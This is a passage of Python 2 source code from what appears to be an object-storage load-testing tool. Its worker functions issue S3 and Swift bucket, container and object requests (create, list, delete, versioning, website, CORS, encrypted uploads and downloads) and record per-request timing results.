i += 1
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def swiftlist_user_containers(process_id, user, conn, result_queue):
request_type = 'swiftListUserContainers'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk)
rest.headers['X-auth-token'] = user.sk
i = 0
while i < CONFIG['RequestsPerThread']:
i += 1
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def swiftcreate_container(process_id, user, conn, result_queue):
request_type = 'swiftCreateContainer'
sendContent = ''
rest = s3PyCmd.S3RequestDescriptor(request_type, ak = user.ak, sk = user.sk, send_content = sendContent)
rest.headers['X-auth-token'] = user.sk
i = process_id % CONFIG['ThreadsPerUser']
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
#rest.bucket = '%s.%d' % (CONFIG['BucketNamePrefix'], i)
i += CONFIG['ThreadsPerUser']
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def swifthead_container(process_id, user, conn, result_queue):
request_type = 'swiftHeadContainer'
sendContent = ''
rest = s3PyCmd.S3RequestDescriptor(request_type, ak = user.ak, sk = user.sk, send_content = sendContent)
rest.headers['X-auth-token'] = user.sk
i = process_id % CONFIG['ThreadsPerUser']
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += CONFIG['ThreadsPerUser']
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def create_bucket(process_id, user, conn, result_queue):
request_type = 'CreateBucket'
send_content = ''
if CONFIG['BucketLocation']:
send_content = '<CreateBucketConfiguration xmlns="http://s3.amazonaws.com/doc/2006-03-01/">\
<LocationConstraint>%s</LocationConstraint></CreateBucketConfiguration >' % random.choice(
CONFIG['BucketLocation'].split(','))
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], send_content=send_content,
virtual_host=CONFIG['VirtualHost'], domain_name=CONFIG['DomainName'],
region=CONFIG['Region'])
if CONFIG['CreateWithACL']:
rest.headers['x-amz-acl'] = CONFIG['CreateWithACL']
if CONFIG['MDCPolicy']:
rest.headers['x-hws-mdc-storage-policy'] = CONFIG['MDCPolicy']
if CONFIG['StorageClass']:
rest.headers['x-default-storage-class'] = CONFIG['StorageClass']
i = process_id % CONFIG['ThreadsPerUser']
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += CONFIG['ThreadsPerUser']
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def swiftlist_objects_in_container(process_id, user, conn, result_queue):
request_type = 'swiftListObjectsInContainer'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak = user.ak, sk = user.sk)
rest.headers['X-auth-token'] = user.sk
rest.queryArgs['limit'] = CONFIG['Max-keys']
i = 0
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i = i + 1
marker = ''
while marker != None:
rest.queryArgs['marker'] = marker
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
marker = resp.return_data
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def list_objects_in_bucket(process_id, user, conn, result_queue):
request_type = 'ListObjectsInBucket'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
rest.queryArgs['max-keys'] = CONFIG['Max-keys']
i = 0
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += 1
marker = ''
while marker is not None:
rest.queryArgs['marker'] = marker
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
marker = resp.return_data
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def head_bucket(process_id, user, conn, result_queue):
request_type = 'HeadBucket'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
i = process_id % CONFIG['ThreadsPerUser']
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += CONFIG['ThreadsPerUser']
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def swiftdelete_container(process_id, user, conn, result_queue):
request_type = 'swiftDeleteContainer'
sendContent = ''
rest = s3PyCmd.S3RequestDescriptor(request_type, ak = user.ak, sk = user.sk, send_content = sendContent)
rest.headers['X-auth-token'] = user.sk
i = process_id % CONFIG['ThreadsPerUser']
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += CONFIG['ThreadsPerUser']
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def delete_bucket(process_id, user, conn, result_queue):
request_type = 'DeleteBucket'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
i = process_id % CONFIG['ThreadsPerUser']
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += CONFIG['ThreadsPerUser']
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def bucket_delete(process_id, user, conn, result_queue):
request_type = 'BucketDelete'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
rest.queryArgs['deletebucket'] = None
i = process_id % CONFIG['ThreadsPerUser']
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += CONFIG['ThreadsPerUser']
rest.sendContent = '<?xml version="1.0" encoding="UTF-8"?><DeleteBucket><Bucket>' + rest.bucket + '</Bucket></DeleteBucket>'
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def options_bucket(process_id, user, conn, result_queue):
request_type = 'OPTIONSBucket'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
rest.headers['Access-Control-Request-Method'] = 'GET'
rest.headers['Origin'] = CONFIG['DomainName']
i = process_id % CONFIG['ThreadsPerUser']
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += CONFIG['ThreadsPerUser']
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def put_bucket_versioning(process_id, user, conn, result_queue):
request_type = 'PutBucketVersioning'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk, auth_algorithm=CONFIG['AuthAlgorithm'],
virtual_host=CONFIG['VirtualHost'], domain_name=CONFIG['DomainName'],
region=CONFIG['Region'])
rest.queryArgs['versioning'] = None
rest.sendContent = '<VersioningConfiguration><Status>%s</Status></VersioningConfiguration>' % CONFIG[
'VersionStatus']
rest.headers['Content-MD5'] = base64.b64encode(hashlib.md5(rest.sendContent).digest())
i = process_id % CONFIG['ThreadsPerUser']
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
logging.info('bucket:' + rest.bucket)
i += CONFIG['ThreadsPerUser']
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def get_bucket_versioning(process_id, user, conn, result_queue):
request_type = 'GetBucketVersioning'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
rest.queryArgs['versioning'] = None
i = process_id % CONFIG['ThreadsPerUser']
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += CONFIG['ThreadsPerUser']
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def put_bucket_website(process_id, user, conn, result_queue):
request_type = 'PutBucketWebsite'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
rest.queryArgs['website'] = None
i = process_id % CONFIG['ThreadsPerUser']
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += CONFIG['ThreadsPerUser']
rest.sendContent = '<WebsiteConfiguration><RedirectAllRequestsTo><HostName>' + CONFIG[
'RedirectHostName'] + '</HostName></RedirectAllRequestsTo></WebsiteConfiguration>'
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def get_bucket_website(process_id, user, conn, result_queue):
request_type = 'GetBucketWebsite'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
rest.queryArgs['website'] = None
i = process_id % CONFIG['ThreadsPerUser']
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += CONFIG['ThreadsPerUser']
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def delete_bucket_website(process_id, user, conn, result_queue):
request_type = 'DeleteBucketWebsite'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
rest.queryArgs['website'] = None
i = process_id % CONFIG['ThreadsPerUser']
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += CONFIG['ThreadsPerUser']
rest.sendContent = '<WebsiteConfiguration><RedirectAllRequestsTo><HostName>' + CONFIG[
'RedirectHostName'] + '</HostName></RedirectAllRequestsTo></WebsiteConfiguration>'
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def put_bucket_cors(process_id, user, conn, result_queue):
request_type = 'PutBucketCORS'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
rest.queryArgs['cors'] = None
rest.sendContent = '<CORSConfiguration><CORSRule><AllowedMethod>GET</AllowedMethod><AllowedOrigin>%s</AllowedOrigin></CORSRule></CORSConfiguration>' % \
CONFIG['DomainName']
rest.headers['Content-MD5'] = base64.b64encode(hashlib.md5(rest.sendContent).digest())
i = process_id % CONFIG['ThreadsPerUser']
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += CONFIG['ThreadsPerUser']
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def get_bucket_cors(process_id, user, conn, result_queue):
request_type = 'GetBucketCORS'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
rest.queryArgs['cors'] = None
i = process_id % CONFIG['ThreadsPerUser']
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += CONFIG['ThreadsPerUser']
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def delete_bucket_cors(process_id, user, conn, result_queue):
request_type = 'DeleteBucketCORS'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
rest.queryArgs['cors'] = None
i = process_id % CONFIG['ThreadsPerUser']
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += CONFIG['ThreadsPerUser']
# DELETE ?cors carries no request body
rest.sendContent = ''
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def put_object(process_id, user, conn, result_queue):
request_type = 'PutObject'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
rest.headers['content-type'] = 'application/octet-stream'
if CONFIG['PutWithACL']:
rest.headers['x-amz-acl'] = CONFIG['PutWithACL']
fixed_size = False
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
if CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNameFixed']
if CONFIG['SrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-server-side-encryption-customer-algorithm'] = 'AES256'
elif CONFIG['SrvSideEncryptType'].lower() == 'sse-kms' and CONFIG['SrvSideEncryptAlgorithm'].lower() == 'aws:kms':
rest.headers['x-amz-server-side-encryption'] = 'aws:kms'
if CONFIG['SrvSideEncryptAWSKMSKeyId']:
rest.headers['x-amz-server-side-encryption-aws-kms-key-id'] = CONFIG['SrvSideEncryptAWSKMSKeyId']
if CONFIG['SrvSideEncryptContext']:
rest.headers['x-amz-server-side-encryption-context'] = CONFIG['SrvSideEncryptContext']
elif CONFIG['SrvSideEncryptType'].lower() == 'sse-kms' and CONFIG['SrvSideEncryptAlgorithm'].lower() == 'aes256':
rest.headers['x-amz-server-side-encryption'] = 'AES256'
# If the CalHashMD5 switch is on, write a custom metadata entry at upload time to mark the object as one uploaded by this tool's put.
if CONFIG['CalHashMD5']:
rest.headers['x-amz-meta-md5written'] = 'yes'
# With object versioning, the version ID has to be recorded after each upload.
obj_v = ''
obj_v_file = 'data/objv-%d.dat' % process_id
open(obj_v_file, 'w').write(obj_v)
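# Each record appended to this file below is one line of the form bucket<TAB>key<TAB>versionId
# (a value such as "ak0.bucket.0<TAB>obj-0-0<TAB>0004F8F1" is purely illustrative); GetObject and
# DeleteObject later replay these triples through handle_from_obj_v().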
# Stagger each thread's starting bucket to avoid a single-bucket performance bottleneck.
range_arr = range(0, CONFIG['BucketsPerUser'])
if CONFIG['AvoidSinBkOp']:
range_arr = range(process_id % CONFIG['BucketsPerUser'], CONFIG['BucketsPerUser']) + range(0,
process_id % CONFIG[
'BucketsPerUser'])
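# Illustrative staggering (assumed values): with BucketsPerUser=4, process_id=6 gives
# 6 % 4 == 2, so range_arr = [2, 3] + [0, 1] = [2, 3, 0, 1] and this thread starts on bucket 2.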
for i in range_arr:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
j = 0
while j < CONFIG['ObjectsPerBucketPerThread']:
if not CONFIG['ObjectNameFixed']:
if CONFIG['ObjectLexical']:
rest.key = CONFIG['ObjectNamePartten'].replace('processID', str(process_id)).replace('Index', str(
j)).replace(
'ObjectNamePrefix', CONFIG['ObjectNamePrefix'])
else:
rest.key = Util.random_string_create(random.randint(300, 1024))
if CONFIG['SrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-server-side-encryption-customer-key'] = base64.b64encode(rest.key[-32:].zfill(32))
rest.headers['x-amz-server-side-encryption-customer-key-MD5'] = base64.b64encode(
hashlib.md5(rest.key[-32:].zfill(32)).digest())
logging.debug('side-encryption-customer-key: [%r]' % rest.key[-32:].zfill(32))
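# Sketch of the SSE-C key derivation above: the customer key is just the last 32 characters of the
# object key left-padded with zeros (e.g. key "obj-0-7" -> "0" * 25 + "obj-0-7", illustrative only),
# so the read paths can re-derive the same key from the object name without storing it.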
j += 1
put_times_for_one_obj = CONFIG['PutTimesForOneObj']
while put_times_for_one_obj > 0:
if not fixed_size:
# change size every request for the same obj.
rest.contentLength, fixed_size = Util.generate_a_size(CONFIG['ObjectSize'])
put_times_for_one_obj -= 1
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request(cal_md5=CONFIG['CalHashMD5'])
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, 'MD5:' + str(resp.content_md5),
resp.request_id, resp.status))
if resp.return_data:
obj_v += '%s\t%s\t%s\n' % (rest.bucket, rest.key, resp.return_data)
# Flush the object version IDs to the local file objv-process_id.dat once 1 KB has accumulated.
if len(obj_v) >= 1024:
logging.info('write obj_v to file %s' % obj_v_file)
open(obj_v_file, 'a').write(obj_v)
obj_v = ''
if obj_v:
open(obj_v_file, 'a').write(obj_v)
def swiftput_object(process_id, user, conn, result_queue):
request_type = 'swiftPutObject'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk)
rest.headers['content-type'] = 'application/octet-stream'
rest.headers['X-auth-token'] = user.sk
fixed_size = False
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
if CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNameFixed']
# If the CalHashMD5 switch is on, write a custom metadata entry at upload time to mark the object as one uploaded by this tool's put.
if CONFIG['CalHashMD5']:
rest.headers['x-amz-meta-md5written'] = 'yes'
# With object versioning, the version ID has to be recorded after each upload.
obj_v = ''
obj_v_file = 'data/objv-%d.dat' % process_id
open(obj_v_file, 'w').write(obj_v)
# Stagger each thread's starting bucket to avoid a single-bucket performance bottleneck.
range_arr = range(0, CONFIG['BucketsPerUser'])
if CONFIG['AvoidSinBkOp']:
range_arr = range(process_id % CONFIG['BucketsPerUser'], CONFIG['BucketsPerUser']) + range(0,
process_id % CONFIG[
'BucketsPerUser'])
for i in range_arr:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
# rest.bucket = '%s.%d' % (CONFIG['BucketNamePrefix'], i)
j = 0
while j < CONFIG['ObjectsPerBucketPerThread']:
if not CONFIG['ObjectNameFixed']:
if CONFIG['ObjectLexical']:
rest.key = CONFIG['ObjectNamePartten'].replace('processID', str(process_id)).replace('Index', str(
j)).replace(
'ObjectNamePrefix', CONFIG['ObjectNamePrefix'])
else:
rest.key = Util.random_string_create(random.randint(300, 1024))
j += 1
put_times_for_one_obj = CONFIG['PutTimesForOneObj']
while put_times_for_one_obj > 0:
if not fixed_size:
# change size every request for the same obj.
rest.contentLength, fixed_size = Util.generate_a_size(CONFIG['ObjectSize'])
put_times_for_one_obj -= 1
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request(cal_md5=CONFIG['CalHashMD5'])
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, 'MD5:' + str(resp.content_md5),
resp.request_id, resp.status))
if resp.return_data:
obj_v += '%s\t%s\t%s\n' % (rest.bucket, rest.key, resp.return_data)
# Flush the object version IDs to the local file objv-process_id.dat once 1 KB has accumulated.
if len(obj_v) >= 1024:
logging.info('write obj_v to file %s' % obj_v_file)
open(obj_v_file, 'a').write(obj_v)
obj_v = ''
if obj_v:
open(obj_v_file, 'a').write(obj_v)
def handle_from_objects(request_type, rest, process_id, user, conn, result_queue):
"""
:type result_queue: Queue
"""
global OBJECTS
objects_per_user = len(OBJECTS) / CONFIG['Threads']
if objects_per_user == 0:
if process_id >= len(OBJECTS):
return
else:
start_index = end_index = process_id
else:
extra_obj = len(OBJECTS) % CONFIG['Threads']
if process_id == 0:
start_index = 0
end_index = objects_per_user + extra_obj
else:
start_index = process_id * objects_per_user + extra_obj
end_index = start_index + objects_per_user
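# Worked example (assumed values): with len(OBJECTS)=10 and CONFIG['Threads']=4,
# objects_per_user=2 and extra_obj=2, so process 0 handles indices [0,4), process 1 [4,6),
# process 2 [6,8) and process 3 [8,10).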
while start_index < end_index:
rest.bucket = OBJECTS[start_index][:OBJECTS[start_index].find('/')]
rest.key = OBJECTS[start_index][OBJECTS[start_index].find('/') + 1:]
if CONFIG['Testcase'] in (202,) and CONFIG['Range']:
rest.headers['Range'] = 'bytes=%s' % random.choice(CONFIG['Range'].split(';')).strip()
start_index += 1
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request(cal_md5=CONFIG['CalHashMD5'])
if CONFIG["Testcase"] in (202,):
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, 'MD5:' + str(resp.content_md5),
resp.request_id, resp.status))
else:
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def handle_from_obj_v(request_type, obj_v_file, rest, process_id, user, conn, result_queue):
obj_v_file_read = open(obj_v_file, 'r')
obj = obj_v_file_read.readline()
while obj:
if obj and len(obj.split('\t')) != 3:
logging.info('obj [%r] format error in file %s' % (obj, obj_v_file))
# advance to the next line before skipping, otherwise this loop never terminates
obj = obj_v_file_read.readline()
continue
obj = obj[:-1]
rest.bucket = obj.split('\t')[0]
rest.key = obj.split('\t')[1]
if rest.requestType == 'GetObject':
if CONFIG['SrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-server-side-encryption-customer-key'] = base64.b64encode(rest.key[-32:].zfill(32))
rest.headers['x-amz-server-side-encryption-customer-key-MD5'] = base64.b64encode(
hashlib.md5(rest.key[-32:].zfill(32)).digest())
rest.queryArgs['versionId'] = obj.split('\t')[2]
obj = obj_v_file_read.readline()
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request(cal_md5=CONFIG['CalHashMD5'])
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, 'MD5:' + str(resp.content_md5),
resp.request_id, resp.status))
def get_object(process_id, user, conn, result_queue):
request_type = 'GetObject'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
if CONFIG['SrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-server-side-encryption-customer-algorithm'] = 'AES256'
if CONFIG['Testcase'] in (202, 900) and CONFIG['Range']:
rest.headers['Range'] = 'bytes=%s' % random.choice(CONFIG['Range'].split(';')).strip()
# If OBJECTS was passed in, process OBJECTS directly.
global OBJECTS
if OBJECTS:
handle_from_objects(request_type, rest, process_id, user, conn, result_queue)
return
# If the data directory holds records of uploaded object names and versions, read from that file.
obj_v_file = 'data/objv-%d.dat' % process_id
if os.path.exists(obj_v_file) and os.path.getsize(obj_v_file) > 0:
handle_from_obj_v(request_type, obj_v_file, rest, process_id, user, conn, result_queue)
return
# Otherwise download using the lexically generated object names.
if not CONFIG['ObjectLexical']:
logging.warn('Object name is not lexical, exit..')
return
i = 0
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
if CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += 1
j = 0
while j < CONFIG['ObjectsPerBucketPerThread']:
if CONFIG['Range']:
rest.headers['Range'] = 'bytes=%s' % random.choice(CONFIG['Range'].split(';')).strip()
if not CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNamePartten'].replace('processID', str(process_id)).replace('Index',
str(j)).replace(
'ObjectNamePrefix', CONFIG['ObjectNamePrefix'])
j += 1
if CONFIG['SrvSideEncryptType'].lower() == 'sse-c':
